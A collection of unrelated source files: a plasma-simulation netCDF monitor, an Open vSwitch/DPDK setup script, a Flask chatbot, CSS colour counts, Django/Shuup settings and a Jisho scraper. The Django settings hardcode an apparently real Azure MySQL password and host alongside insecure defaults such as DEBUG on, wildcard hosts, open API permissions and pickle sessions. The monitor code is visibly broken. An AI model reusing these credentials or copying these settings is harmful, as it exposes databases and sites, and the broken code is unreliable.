#----------------------------------------------------------------------------------------------
#
# init_monitor_file function
#
# Analyze the Plasma State dependencies of the variables requested to be monitored.
# Define the initial monitor netcdf file. Load the initial data into the monitor file
# By a call to the 'step' function. Also saves the internal state needed to restart
# the monitor component. In particular monitorVars and ps_VarsList are pickled to a
# file called monitor_restart.
#----------------------------------------------------------------------------------------------
def init_monitor_file(self, cur_state_file, timeStamp = 0):
"""Function init_monitor_file generates the initial netcdf file for monitor data
and saves the internal state needed to restart the monitor component
"""
print ' '
print 'gyro_monitor_component: init_monitor_file'
# Get global configuration parameters
try:
Global_label = services.get_config_param('SIM_NAME')
except Exception, e:
message = 'gyro_monitor_comp init(): could not get config parameter SIM_NAME'
print message, e
raise Exception, message
print 'Global_label = ', Global_label
try:
RUN_ID = services.get_config_param('SIM_NAME')
except Exception, e:
message = 'gyro_monitor_comp init(): could not get config parameter RUN_ID'
print message, e
raise Exception, message
print 'RUN_ID = ', RUN_ID
try:
tokamak_id = services.get_config_param('SIM_NAME')
except Exception, e:
message = 'gyro_monitor_comp init(): could not get config parameter tokamak_id'
print message, e
raise Exception, message
print 'tokamak_id = ', tokamak_id
try:
shot_number = services.get_config_param('SIM_NAME')
except Exception, e:
message = 'gyro_monitor_comp init(): could not get config parameter shot_number'
print message, e
raise Exception, message
print 'shot_number = ', shot_number
# Get monitor variables
# Get data from out.gyro.error
input_lines = getlines(os.path.join(gyro_work_path, 'out.gyro.error'))
# Find out how many species are included i.e. number of columns in file
n_species = len(input_lines[0].split())
for i in range(n_species):
var_name = 'species_' + str(i+1)
monitorVars.append(var_name)
monitorDefinition.update( {var_name: ['S', ' ', [] ]})
#
## Define monitor file
#
# Open the monitor file for output
monitor_file = Dataset(monitor_fileName, 'w', format = 'NETCDF3_CLASSIC')
# make global netcdf attribute of monitor component version number
setattr(monitor_file, 'monitor_comp_version', monitor_comp_version)
# make global netcdf attribute for Global_label
setattr(monitor_file, 'Global_label', Global_label)
# make global netcdf attribute for RunID
setattr(monitor_file, 'RunID', RunID)
# make global netcdf attribute for tokamak_id
setattr(monitor_file, 'tokamak_id', tokamak_id)
# make global netcdf attribute for shot_number
setattr(monitor_file, 'shot_number', shot_number)
# Create unlimited time dimension and define time variable
monitor_file.createDimension('timeDim', None)
time = monitor_file.createVariable('time', float, ('timeDim',))
setattr(time, 'units', '-')
# Create grid dimensions and variables and load up grids
# use this to keep track of mon_grid name, grid_dim_name and grid_dim_value
grid_map = {}
for grid in monitorGrids:
pass
# Create monitor variables in netCDF4
for var in monitorVars:
if debug:
print 'creating variable ', var
# Generate the dimension tuple
dims = ('timeDim',)
varKind = monitorDefinition[var][0]
if varKind == 'S':
mon_obj = monitor_file.createVariable(var, float, dims)
elif varKind == 'P':
varGridsList = monitorDefinition[var][3]
# add in dimension names for plotting grids
for grid in varGridsList:
dims = dims + grid_map[grid][1]
mon_obj = monitor_file.createVariable(var, float, dims )
elif varKind == 'SL':
varDimList = monitorDefinition[var][3]
# add in dimension names
for dim_name in varDimList:
dims = dims + (dim_name,)
mon_obj = monitor_file.createVariable(var, float, dims )
elif varKind == '2D': # See note at top about the order of dims in definition
varGridsList = monitorDefinition[var][3]
for grid in varGridsList: # add in dimension names for plotting grids
dims = dims + grid_map[grid][1]
if debug:
print var, ' dimensions = ', dims
mon_obj = monitor_file.createVariable(var, float, dims )
varUnits = monitorDefinition[var][1]
#Generate units atribute for var
setattr(mon_obj, 'units', varUnits)
# Finished defining monitor file. Close it.
monitor_file.close()
# insert intitial data
self.step(timeStamp)
print 'monitor file initialization finished'
# Save monitorVars and ps_VarsList and monitorDefinition, are pickled to file "monitor_restart".
pickleDict = {'monitorVars' : monitorVars, 'monitorDefinition': monitorDefinition}
pickFile = open('monitor_restart', 'w')
pickle.dump(pickleDict, pickFile)
pickFile.close()
return 0
#----------------------------------------------------------------------------------------------
#
# update_monitor_file function
#
# Opens current plasma state file and monitor netcdf file. Pulls the needed variables out of
# the plasma state file. Computes the monitor variables from plasma state data (in functinon
# calculate_MonitorVariable). And loads the data into the monitor netcdf variables.
#
#----------------------------------------------------------------------------------------------
def update_monitor_file(self, cur_state_file, timeStamp = 0):
print ' '
print 'monitor_component: update_monitor_file'
#Open Plasma State file
plasma_state = Dataset(cur_state_file, 'r', format = 'NETCDF3_CLASSIC')
# Get all Plasma State variable objects for dependencies
ps_variables = {}
for var in ps_VarsList:
ps_variables[var] = plasma_state.variables[var]
if debug:
print ' '
print 'ps_variables.keys() = ', ps_variables.keys()
# Open the monitor file for output
monitor_file = Dataset(monitor_fileName, 'r+', format = 'NETCDF3_CLASSIC')
if debug:
all_mon_Dims = monitor_file.dimensions
all_mon_VarNames = monitor_file.variables.keys()
print ' '
print 'all_mon_Dims = ', all_mon_Dims
print ' '
print 'all_mon_VarNames = ', all_mon_VarNames
# Get time variable object
time = monitor_file.variables['time']
n_step =time.shape[0] # Time step number (initially 0)
print 'time step number = ', n_step
time[n_step] = float(timeStamp)
# Insert data into monitor variables
for var in monitorVars:
# Get the netcdf variable object for this variable
var_obj = monitor_file.variables[var]
# Get Plasma State variables for this monitor variable's dependencies
varDepsDict ={}
varDepsList = monitorDefinition[var][2]
for dep in varDepsList:
varDepsDict[dep] = ps_variables[dep]
if debug:
print ' '
print 'var =', var
print 'varDepsDict.keys = ', varDepsDict.keys()
print 'varDepsDict = ', varDepsDict
# calculate the monitor variable
value = self.calculate_MonitorVariable(var, varDepsDict)
# Load the data into monitor variables
varKind = monitorDefinition[var][0]
if varKind == 'S':
var_obj[n_step] = value
if varKind == 'P':
var_obj[n_step,:] = value
if varKind == 'SL':
var_obj[n_step,:] = value
if varKind == '2D':
var_obj[n_step,:] = value
# Finished writing to monitor file. Close it.
monitor_file.close()
# Close plasma_state
plasma_state.close()
print 'update_monitor_file finished'
return 0
#----------------------------------------------------------------------------------------------
#
# calculate_MonitorVariable function
#
# For given montor variable it calculates the variable value from the netcdf variable objects
# in the varDepsDict dictionary on which the monitor variable depends.
#
#----------------------------------------------------------------------------------------------
def calculate_MonitorVariable(self, var, varDepsDict):
if debug:
print 'calculate_MonitorVariable, var = ', var
for dep_name in varDepsDict.keys():
print dep_name, '= ', varDepsDict[dep_name][:]
print dep_name, ' shape = ', varDepsDict[dep_name].shape
if debug:
print ' '
print var, ' = ', value
return value
|
12,781 | e0b4d765d7fadb20466a6a17c2e5ce56cd6146d3 | #!/bin/python3
import os
import argparse
import sys
import subprocess
#mail: zhaojunchao@loongson.cn
arg_f = False;
hugepagenum = "";
db_socket = "db.sock";
en_dpdk=True;
dir_bin = "./bin/";
dir_sbin = "./sbin/";
dir_work = os.getcwd() + "/";
dir_etc = "./etc/openvswitch/"
dir_var_run = "./var/run/openvswitch/"
dir_var_log = "./var/log/openvswitch/"
dir_share = "./share/openvswitch/"
ret_sdk = os.getenv('RTE_SDK')
ret_target = os.getenv('RTE_TARGET');
parse = argparse.ArgumentParser();
parse.add_argument('-pages',default="128", type=str);
parse.add_argument('-addbr',type=str);
parse.add_argument('-dpdk', default="yes", type=str);
parse.add_argument('-addport',type=str, nargs=3);
print("work dir:" + dir_work);
def print_error(pstr):
print("\033[27;31;31m\t{}\033[0m".format(pstr))
def init_hugepage(num):
os.system("echo {} > /proc/sys/vm/nr_hugepages".format(num));
ps = subprocess.run(["cat", "/proc/sys/vm/nr_hugepages"], stdout=subprocess.PIPE);
if(num in str(ps.stdout)):
print("set hugepage_nr {} success".format(num));
else:
print_error("set hugepage_nr error! nr is {}".format(str(ps.stdout)));
exit(-1);
#TODO: for x86
os.system("mount -t hugetlbfs -o pagesize=32768k none /dev/hugepages")
def init_kmod():
global en_dpdk
if(en_dpdk and (ret_sdk is None)):
print_error("please set RET_SDK and RTE_RARGET");
exit(-1);
os.system("modprobe uio");
os.system("modprobe openvswitch");
if(en_dpdk):
os.system("insmod " + ret_sdk + "/" + ret_target + "/kmod/igb_uio.ko");
ps = subprocess.run(["lsmod"], stdout=subprocess.PIPE);
if (en_dpdk == False):
print("no dpdk");
elif ("igb_uio" in str(ps.stdout)):
print("igb_uio mod ok");
else:
print_error("ismod igb_uio error");
exit(-1);
if("openvswitch" in str(ps.stdout)):
print("OVS mod ok");
else:
print("ismod OVS error");
exit(-1);
def init_env():
global en_dpdk
if(en_dpdk and (ret_sdk is None)):
print("please set RET_SDK and RTE_RARGET");
exit(-1);
if(not os.path.isfile("./bin/ovs-vsctl")):
print_error("not in OVS install dir");
exit(-1);
if (not os.path.isdir(dir_etc)):
print("creat " + dir_etc);
os.system("mkdir -p " + dir_etc);
if (not os.path.isdir(dir_var_run)):
print("creat " + dir_var_run);
os.system("mkdir -p " + dir_var_run);
if (not os.path.isdir(dir_var_log)):
print("creat " + dir_var_log);
os.system("mkdir -p " + dir_var_log);
def add_br(name):
os.system(dir_bin + "ovs-vsctl add-br {} -- set bridge {} datapath_type=netdev".format(name, name));
os.system(dir_bin + "ovs-vsctl show");
def add_port(br, name, idx):
if(en_dpdk):
os.system(dir_bin + "ovs-vsctl add-port {} {} -- set Interface {} type=dpdkvhostuserclient options:vhost-server-path=/usr/local/var/run/sock{} mtu_request=1500".format(br,name,name, idx));
else:
os.system(dir_bin + "ovs-vsctl add-port {} {}".format(br, name));
os.system(dir_bin + "ovs-vsctl show");
def clr_env():
os.system("killall ovsdb-server ovs-vswitchd");
os.system("rm ./etc/openvswitch/conf.db");
os.system("rm -f ./var/run/openvswitch/vhost-user*");
def show_info():
print("#hugepagenum : ------------------------------");
os.system("cat /proc/sys/vm/nr_hugepages");
print("# mod ---------------------------------------");
os.system("lsmod | grep uio");
os.system("lsmod | grep openvswitch");
print("# ovs ---------------------------------------");
ps = subprocess.run(["ps", "-ef"], stdout=subprocess.PIPE);
if("ovs-vswitchd" in str(ps.stdout)):
print("ovs-vswitchd is running!");
ps1 = subprocess.run([dir_bin + "ovs-vsctl", "get", "Open_vSwitch", ".", "dpdk_initialized"], stdout=subprocess.PIPE);
if("true" in str(ps1.stdout)):
print("Open_vSwitch . dpdk_initialized");
else:
print_error("Open_vSwitch . dpdk_initialize ERROR!");
else:
print_error("ovs-vswitchd is not running!");
os.system(dir_bin + "ovs-vsctl show");
def cook_arg():
global hugepagenum
global en_dpdk
args = parse.parse_args();
print(args);
hugepagenum = args.pages;
if(not args.dpdk is None):
print(args.dpdk);
if(args.dpdk=="no"):
en_dpdk=False;
if(not args.addbr is None):
print(args.addbr);
add_br(args.addbr);
exit(0);
if(not args.addport is None):
if(len(args.addport) != 3):
print("arg error!");
print("br_name port_name port_id");
exit(-1);
add_port(args.addport[0], args.addport[1], args.addport[2]);
exit(0);
if("page" in sys.argv):
init_hugepage(sys.argv[sys.argv.index("page")+1]);
arg_f = True;
if("mod" in sys.argv):
init_kmod();
arg_f = True;
if("log" in sys.argv):
os.system("cat var/log/openvswitch/ovs-vswitchd.log");
arg_f = True;
if("clr" in sys.argv):
clr_env();
arg_f = True;
if("show" in sys.argv):
show_info();
arg_f = True;
if(arg_f):
exit(0);
cook_arg();
init_env();
init_hugepage(hugepagenum);
init_kmod();
clr_env();
print("creat conf.db");
os.system(dir_bin + "ovsdb-tool create " + dir_etc + "conf.db " + dir_share + "vswitch.ovsschema");
print("start db server");
os.system(dir_sbin + "ovsdb-server --remote=punix:" + db_socket + " --remote=db:Open_vSwitch,Open_vSwitch,manager_options --pidfile --detach");
print("set per port mem");
os.system(dir_bin + "ovs-vsctl --no-wait set Open_vSwitch . other_config:per-port-memory=true");
print("init");
os.system(dir_bin + "ovs-vsctl --no-wait init");
print("set port mask");
if(en_dpdk):
os.system(dir_bin + "ovs-vsctl --no-wait set Open_vSwitch . other_config:dpdk-lcore-mask=0x2");
print("set socket mem");
os.system(dir_bin + "ovs-vsctl --no-wait set Open_vSwitch . other_config:dpdk-socket-mem=2048");
print("init dpdk");
os.system(dir_bin + "ovs-vsctl --no-wait set Open_vSwitch . other_config:dpdk-init=true");
print("set log");
os.system(dir_sbin + "ovs-vswitchd unix:"+ dir_work +"var/run/openvswitch/db.sock --pidfile --detach --log-file=" + dir_var_log +"ovs-vswitchd.log");
ps = subprocess.run([dir_bin + "ovs-vsctl", "get", "Open_vSwitch", ".", "dpdk_initialized"], stdout=subprocess.PIPE);
if("true" in str(ps.stdout)):
print("ovs-vswitchd dpdk start!");
else :
print_error("ovs-vswitchd dpdk start ERROR!");
|
12,782 | 405b953fb91aefb6d66ac1b571640ea3481f7e1d | # -*- coding: utf-8 -*-
from flask import Flask
from flask import request
from flask import jsonify
from flask import json
app = Flask(__name__)
@app.route("/keyboard")
def keyboard():
return jsonify(type='text')
@app.route('/message', methods=['POST'])
def message():
data = json.loads(request.data)
content = data['content']
if content == '5000':
text1 = '한식, 중식, 일식 중에 고르세요.'
elif content == '10000':
text1 = '한식, 중식, 일식 중에 고르세요.'
elif content == '15000':
text1 = '한식, 중식, 일식 중에 고르세요.'
else:
text1 = '5000, 10000, 15000 중에서 입력하세요.'
response = {
"message" : {
"text": text1
}
}
response = json.dumps(response, ensure_ascii=False)
# response2 = json.dumps(response2, ensure_ascii=False)
return response #, response2
'''
@app.route('/message', methods=['POST'])
def message2():
data2 = json.loads(request.data2)
content2 = data2['content2']
if content2 == str('한식'):
food1 = '된장찌개'
elif content2 == str('중식'):
food1 = '짜장면'
elif content2 == str('일식'):
food1 = '라멘'
else:
food1 = '한식, 중식, 일식 중에 고르세요.'
response2 = {
"message2" : {
"food": food1
}
}
'''
if __name__ == '__main__':
app.run(host='0.0.0.0', port=600) |
12,783 | 60f6ceb4b5d1cbdd74a99f076cfe5a68e2cf1c43 | supplier_bg_color = """background-color: #000 \9;
1
background-color: #000;
2
background-color: #0e3e5e;
1
background-color: #117bab;
3
background-color: #145c8b;
4
background-color: #169cd9;
9
background-color: #21c4f3;
1
background-color: #31708f;
2
background-color: #323232;
5
background-color: #333;
6
background-color: #357ebd;
1
background-color: #3c763d;
2
background-color: #4f8d37;
7
background-color: #5e5e5e;
1
background-color: #64b245;
26
background-color: #6f2418;
3
background-color: #777;
3
background-color: #8a6d3b;
2
background-color: #993121;
6
background-color: #a94442;
2
background-color: #aaa;
1
background-color: #afd9ee;
1
background-color: #c1e2b3;
1
background-color: #c4e3f3;
2
background-color: #d0e9c6;
2
background-color: #d9edf7;
5
background-color: #db8905;
3
background-color: #dff0d8;
6
background-color: #e4b9b9;
1
background-color: #e5e5e5;
2
background-color: #e6e6e6;
2
background-color: #e8e8e8;
2
background-color: #ebcccc;
2
background-color: #ebebeb;
1
background-color: #eee;
9
background-color: #efefef;
4
background-color: #f2dede;
6
background-color: #f5f5f5;
11
background-color: #f7ecb5;
1
background-color: #f7f7f7;
1
background-color: #f9f2f4;
1
background-color: #f9f9f9;
1
background-color: #faa419;
6
background-color: #faf2cc;
2
background-color: #fafafa;
1
background-color: #fcf8e3;
7
background-color: #fff !important;
1
background-color: #fff;
36
background-color: '{{accent-700}}';
1
background-color: '{{accent-A700}}';
2
background-color: '{{accent-color}}';
8
background-color: '{{background-200}}';
1
background-color: '{{background-500-0.2}}';
2
background-color: '{{background-50}}';
2
background-color: '{{foreground-4}}';
1
background-color: '{{primary-600}}';
1
background-color: '{{primary-color}}';
4
background-color: '{{warn-700}}';
1
background-color: '{{warn-color-0.26}}';
4
background-color: '{{warn-color}}';
4
background-color: rgb(100,178,84);
10
background-color: rgb(129,199,132);
10
background-color: rgb(143,206,242);
14
background-color: rgb(158,158,158);
4
background-color: rgb(181,219,165);
10
background-color: rgb(187,222,251);
8
background-color: rgb(189,189,189);
4
background-color: rgb(198,40,40);
10
background-color: rgb(200,230,201);
4
background-color: rgb(211,47,47);
4
background-color: rgb(22,156,217);
26
background-color: rgb(224,224,224);
9
background-color: rgb(229,115,115);
10
background-color: rgb(238,238,238);
4
background-color: rgb(244,67,54);
10
background-color: rgb(245,245,245);
4
background-color: rgb(250,250,250);
20
background-color: rgb(255,138,128);
10
background-color: rgb(255,205,210);
8
background-color: rgb(255,255,255);
9
background-color: rgb(33,33,33);
9
background-color: rgb(46,125,50);
10
background-color: rgb(64,157,227);
14
background-color: rgb(66,66,66);
9
background-color: rgb(98,182,235);
14
background-color: rgb(99,184,83);
4
background-color: rgba(0,0,0,0);
1
background-color: rgba(0,0,0,0.12);
20
background-color: rgba(0,0,0,0.26);
12
background-color: rgba(0,0,0,0.54);
8
background-color: rgba(100,178,84,0.26);
3
background-color: rgba(100,178,84,0.5);
1
background-color: rgba(100,178,84,0.87);
2
background-color: rgba(129,199,132,0.26);
3
background-color: rgba(129,199,132,0.5);
1
background-color: rgba(129,199,132,0.87);
2
background-color: rgba(143,206,242,0.26);
3
background-color: rgba(143,206,242,0.5);
1
background-color: rgba(143,206,242,0.87);
2
background-color: rgba(158,158,158,0.2);
8
background-color: rgba(181,219,165,0.26);
3
background-color: rgba(181,219,165,0.5);
1
background-color: rgba(181,219,165,0.87);
2
background-color: rgba(198,40,40,0.26);
2
background-color: rgba(198,40,40,0.5);
1
background-color: rgba(198,40,40,0.87);
2
background-color: rgba(22,156,217,0.26);
3
background-color: rgba(22,156,217,0.5);
1
background-color: rgba(22,156,217,0.87);
2
background-color: rgba(229,115,115,0.26);
2
background-color: rgba(229,115,115,0.5);
1
background-color: rgba(229,115,115,0.87);
2
background-color: rgba(244,67,54,0.26);
2
background-color: rgba(244,67,54,0.5);
1
background-color: rgba(244,67,54,0.87);
2
background-color: rgba(255,138,128,0.26);
2
background-color: rgba(255,138,128,0.5);
1
background-color: rgba(255,138,128,0.87);
2
background-color: rgba(46,125,50,0.26);
3
background-color: rgba(46,125,50,0.5);
1
background-color: rgba(46,125,50,0.87);
2
background-color: rgba(64,157,227,0.26);
3
background-color: rgba(64,157,227,0.5);
1
background-color: rgba(64,157,227,0.87);
2
background-color: rgba(98,182,235,0.26);
3
background-color: rgba(98,182,235,0.5);
1
background-color: rgba(98,182,235,0.87);
2
background-color: transparent !important;
1
background-color: transparent;
41
background-color: white;
1
"""
supplier_text_color = """
color: #000 !important;
1
color: #000;
3
color: #08c;
1
color: #09c;
1
color: #0f6a94;
4
color: #169cd9;
11
color: #245269;
2
color: #262626;
1
color: #2b542c;
2
color: #31708f;
7
color: #333;
16
color: #3c763d;
10
color: #3f3f3f;
3
color: #444;
6
color: #457b30;
2
color: #4f8d37;
1
color: #555;
8
color: #64b245;
14
color: #66512c;
2
color: #727272;
1
color: #737373;
2
color: #777;
20
color: #843534;
2
color: #8a6d3b;
9
color: #8c8c8c;
1
color: #993121;
6
color: #999;
5
color: #B1B1B2;
1
color: #CCCCCC;
2
color: #a94442;
10
color: #aaa;
1
color: #b1b1b1;
1
color: #b2b2b2;
1
color: #c1e1f6;
2
color: #c7254e;
1
color: #ccc;
4
color: #d9edf7;
1
color: #dcefd4;
1
color: #dff0d8;
1
color: #e6e6e6;
1
color: #eee;
2
color: #f2dede;
1
color: #f5f5f5;
1
color: #faa419;
3
color: #fcf8e3;
1
color: #fff;
88
color: '{{accent-100}}';
3
color: '{{accent-A200}}';
1
color: '{{accent-color}}';
3
color: '{{accent-contrast}}';
8
color: '{{background-50}}';
2
color: '{{background-contrast}}';
2
color: '{{foreground-2}}';
1
color: '{{foreground-3}}';
3
color: '{{primary-100}}';
2
color: '{{primary-600-1}}';
2
color: '{{primary-A200}}';
1
color: '{{primary-color}}';
4
color: '{{primary-contrast}}';
4
color: '{{warn-100}}';
2
color: '{{warn-A200}}';
1
color: '{{warn-color}}';
2
color: '{{warn-contrast}}';
4
color: currentColor;
1
color: inherit;
16
color: rgb(100,178,84);
19
color: rgb(117,117,117);
12
color: rgb(129,199,132);
7
color: rgb(143,206,242);
6
color: rgb(148,202,122);
4
color: rgb(181,219,165);
7
color: rgb(187,222,251);
12
color: rgb(189,189,189);
4
color: rgb(198,40,40);
4
color: rgb(200,230,201);
8
color: rgb(22,156,217);
6
color: rgb(229,115,115);
4
color: rgb(229,57,53);
8
color: rgb(244,67,54) !important;
4
color: rgb(244,67,54);
20
color: rgb(250,250,250);
8
color: rgb(255,138,128);
4
color: rgb(255,205,210);
8
color: rgb(255,255,255);
50
color: rgb(255,82,82);
4
color: rgb(33,33,33);
4
color: rgb(46,125,50);
7
color: rgb(64,157,227);
18
color: rgb(66,66,66);
4
color: rgb(98,182,235);
18
color: rgb(99,184,83);
12
color: rgba(0,0,0,0.26);
36
color: rgba(0,0,0,0.54);
32
color: rgba(0,0,0,0.87);
78
color: rgba(100,178,84,0.87);
1
color: rgba(129,199,132,0.87);
1
color: rgba(143,206,242,0.87);
1
color: rgba(181,219,165,0.87);
1
color: rgba(198,40,40,0.87);
1
color: rgba(22,156,217,0.87);
1
color: rgba(229,115,115,0.87);
1
color: rgba(244,67,54,0.87);
1
color: rgba(255,138,128,0.87);
1
color: rgba(255,255,255,0.87);
20
color: rgba(46,125,50,0.87);
1
color: rgba(64,157,227,0.87);
1
color: rgba(98,182,235,0.87);
1
color: rgba(99,184,83,1);
8
color: transparent;
2
"""
|
12,784 | 829412b14314de5977ae3f3b788d37a15fa82644 | import os
from shuup.addons import add_enabled_addons
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
SECRET_KEY = "Shhhhh"
DEBUG = True
ALLOWED_HOSTS = ["*"]
MEDIA_ROOT = os.path.join(BASE_DIR, "var", "media")
STATIC_ROOT = os.path.join(BASE_DIR, "var", "static")
MEDIA_URL = "/media/"
SHUUP_ENABLED_ADDONS_FILE = os.path.join(BASE_DIR, "var", "enabled_addons")
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.AllowAny',
)
}
INSTALLED_APPS = add_enabled_addons(SHUUP_ENABLED_ADDONS_FILE, [
# django
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.staticfiles',
# external apps that needs to be loaded before Shuup
'easy_thumbnails',
# shuup themes
'shuup.themes.classic_gray',
# shuup
'shuup.core',
'shuup.admin',
'shuup.addons',
'shuup.default_tax',
'shuup.front',
'shuup.front.apps.auth',
'shuup.front.apps.carousel',
'shuup.front.apps.customer_information',
'shuup.front.apps.personal_order_history',
'shuup.front.apps.saved_carts',
'shuup.front.apps.registration',
'shuup.front.apps.simple_order_notification',
'shuup.front.apps.simple_search',
'shuup.front.apps.recently_viewed_products',
'shuup.notify',
'shuup.simple_cms',
'shuup.customer_group_pricing',
'shuup.campaigns',
'shuup.simple_supplier',
'shuup.order_printouts',
'shuup.utils',
'shuup.xtheme',
'shuup.reports',
'shuup.default_reports',
'shuup.regions',
'shuup.importer',
'shuup.default_importer',
'shuup.gdpr',
'shuup.tasks',
'shuup.discounts',
# External Shuup addons
'shuup_api',
'shuup_rest_api',
# external apps
'bootstrap3',
'django_countries',
'django_jinja',
'django_filters',
'filer',
'reversion',
'registration',
'rest_framework',
'rest_framework_swagger'
])
MIDDLEWARE_CLASSES = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'shuup.front.middleware.ProblemMiddleware',
'shuup.core.middleware.ShuupMiddleware',
'shuup.front.middleware.ShuupFrontMiddleware',
'shuup.xtheme.middleware.XthemeMiddleware',
'shuup.admin.middleware.ShuupAdminMiddleware'
]
ROOT_URLCONF = 'shuup_workbench.urls'
WSGI_APPLICATION = 'shuup_workbench.wsgi.application'
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
# }
# }
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'osm',
'USER': 'gaussianapple@oms-db',
'PASSWORD': 'zeaPX2XDTymB',
'HOST': 'oms-db.mysql.database.azure.com',
'PORT': '3306',
}
}
LANGUAGE_CODE = 'en'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
LOGIN_REDIRECT_URL = '/'
DEFAULT_FROM_EMAIL = 'no-reply@example.com'
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
LOGGING = {
'version': 1,
'formatters': {
'verbose': {'format': '[%(asctime)s] (%(name)s:%(levelname)s): %(message)s'},
},
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
},
},
'loggers': {
'shuup': {'handlers': ['console'], 'level': 'DEBUG', 'propagate': True},
}
}
LANGUAGES = [
# List all supported languages here.
#
# Should be a subset of django.conf.global_settings.LANGUAGES. Use
# same spelling for the language names for utilizing the language
# name translations from Django.
('en', 'English'),
('fi', 'Finnish'),
('it', 'Italian'),
('ja', 'Japanese'),
('pt-br', 'Brazilian Portuguese'),
('ru', 'Russian'),
('sv', 'Swedish'),
('zh-hans', 'Simplified Chinese'),
]
PARLER_DEFAULT_LANGUAGE_CODE = "en"
PARLER_LANGUAGES = {
None: [{"code": c, "name": n} for (c, n) in LANGUAGES],
'default': {
'hide_untranslated': False,
}
}
_TEMPLATE_CONTEXT_PROCESSORS = [
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.debug",
"django.template.context_processors.i18n",
"django.template.context_processors.media",
"django.template.context_processors.static",
"django.template.context_processors.request",
"django.template.context_processors.tz",
"django.contrib.messages.context_processors.messages"
]
TEMPLATES = [
{
"BACKEND": "django_jinja.backend.Jinja2",
"APP_DIRS": True,
"OPTIONS": {
"match_extension": ".jinja",
"context_processors": _TEMPLATE_CONTEXT_PROCESSORS,
"newstyle_gettext": True,
"environment": "shuup.xtheme.engine.XthemeEnvironment",
},
"NAME": "jinja2",
},
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": _TEMPLATE_CONTEXT_PROCESSORS,
"debug": DEBUG
}
},
]
# set login url here because of `login_required` decorators
LOGIN_URL = "/login/"
SESSION_SERIALIZER = "django.contrib.sessions.serializers.PickleSerializer"
SHUUP_PRICING_MODULE = "customer_group_pricing"
SHUUP_SETUP_WIZARD_PANE_SPEC = [
"shuup.admin.modules.shops.views:ShopWizardPane",
"shuup.admin.modules.service_providers.views.PaymentWizardPane",
"shuup.admin.modules.service_providers.views.CarrierWizardPane",
"shuup.xtheme.admin_module.views.ThemeWizardPane",
"shuup.testing.modules.sample_data.views.SampleObjectsWizardPane" if DEBUG else "",
"shuup.admin.modules.system.views.TelemetryWizardPane"
]
SHUUP_ERROR_PAGE_HANDLERS_SPEC = [
"shuup.admin.error_handlers:AdminPageErrorHandler",
"shuup.front.error_handlers:FrontPageErrorHandler"
]
SHUUP_SIMPLE_SEARCH_LIMIT = 150
def configure(setup):
setup.commit(globals())
|
12,785 | fa113fc31f920838a747df911c0451fbc59e8512 | import requests
from itertools import zip_longest
from bs4 import BeautifulSoup
from .kana import hiragana, katakana, small_characters, hira2eng, kata2eng
import re
import urllib
import html
import json
ONYOMI_LOCATOR_SYMBOL = 'On'
KUNYOMI_LOCATOR_SYMBOL = 'Kun'
JISHO_API = 'https://jisho.org/api/v1/search/words'
SCRAPE_BASE_URI = 'jisho.org/search/'
STROKE_ORDER_DIAGRAM_BASE_URI = 'https://classic.jisho.org/static/images/stroke_diagrams/'
def remove_new_lines(my_string):
return re.sub('/(?:\r|\n)/g', '', my_string).strip()
def uri_for_search(kanji, filter = "words"):
return "https://" + urllib.parse.quote(f'{SCRAPE_BASE_URI}{kanji}#{filter}')
# I'm 99% sure this is bugged/doesn't work anymore because classic.jisho.org doesn't seem to exist anymore
def getUriForStrokeOrderDiagram(kanji):
return STROKE_ORDER_DIAGRAM_BASE_URI + kanji.encode("unicode-escape").decode("utf-8").replace("\\u", '') + '_frames.png'
def uriForPhraseSearch(phrase):
return f'{JISHO_API}?keyword={urllib.parse.quote(phrase)}'
def get_string_between_strings(data, start_string, end_string):
regex = f'{re.escape(start_string)}(.*?){re.escape(end_string)}'
# Need DOTALL because the HTML still has its newline characters
match = re.search(regex, str(data), re.DOTALL)
return match[1] if match is not None else None
def parse_anchors_to_array(my_string):
regex = r'<a href=".*?">(.*?)</a>'
return re.findall(regex, my_string)
def get_gif_uri(kanji):
"""Uses the unicode of an input kanji to find the corresponding stroke order gif in mistval's collection"""
fileName = kanji.encode("unicode-escape").decode("utf-8").replace("\\u", '') + '.gif'
animationUri = f'https://raw.githubusercontent.com/mistval/kanji_images/master/gifs/{fileName}'
return animationUri
def kana_to_halpern(untrans):
"""Take a word completely in hiragana or katakana and translate it into romaji"""
halpern = []
while untrans:
if len(untrans) > 1:
first = untrans[0]
second = untrans[1]
else:
first = untrans[0]
second = None
if first in hiragana:
if second and second in ["ゃ", "ゅ", "ょ"]:
halpern.append(hira2eng[first + second])
untrans = untrans[2:]
else:
halpern.append(hira2eng[first])
untrans = untrans[1:]
else:
if second and second in ["ャ", "ュ", "ョ"]:
halpern.append(kata2eng[first + second])
untrans = untrans[2:]
else:
halpern.append(kata2eng[first])
untrans = untrans[1:]
del first
del second
return "".join(halpern)
def contains_kana(word):
"""Takes a word and returns true if there are hiragana or katakana present within the word"""
for k in word:
if k in hiragana or k in katakana or k in small_characters:
return True
return False
kanjiRegex = '[\u4e00-\u9faf\u3400-\u4dbf]'
def get_kanji_and_kana(div):
ul = div.select_one('ul')
# contents = ul.contents()
kanji = ''
kana = ''
for child in ul.children:
if child.name == 'li':
li = child
furigana = li.select_one("span.furigana").text if li.select_one("span.furigana") is not None else None
unlifted = li.select_one("span.unlinked").text if li.select_one("span.unlinked") is not None else None
if furigana:
kanji += unlifted
